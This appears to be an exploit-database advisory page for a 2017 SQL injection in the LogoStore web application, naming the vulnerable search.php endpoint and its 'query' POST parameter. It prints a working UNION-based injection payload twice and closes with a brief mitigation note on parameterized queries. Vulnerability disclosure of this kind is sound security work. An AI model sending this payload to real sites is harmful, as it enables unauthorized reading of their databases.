LogoStore - SQL Injection - exploit.company

vendor:

LogoStore

by:

Kaan KAMIS

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: LogoStore

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:codecanyon:logostore

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

LogoStore – SQL Injection

An SQL Injection vulnerability in LogoStore allows attackers to read arbitrary data from the database. Vulnerable URL : http://locahost/LogoStore/search.php Mehod : POST Parameter : query Simple Payload: Type: UNION query Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=Search

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries and to validate user input.

Source

Exploit-DB raw data:

Exploit Title: LogoStore - SQL Injection
Date: 27.01.2017
Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own!

Type of vulnerability:

An SQL Injection vulnerability in LogoStore allows attackers to read
arbitrary data from the database.

Vulnerable URL : http://locahost/LogoStore/search.php
Mehod : POST
Parameter : query

Simple Payload:
Type: UNION query
Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=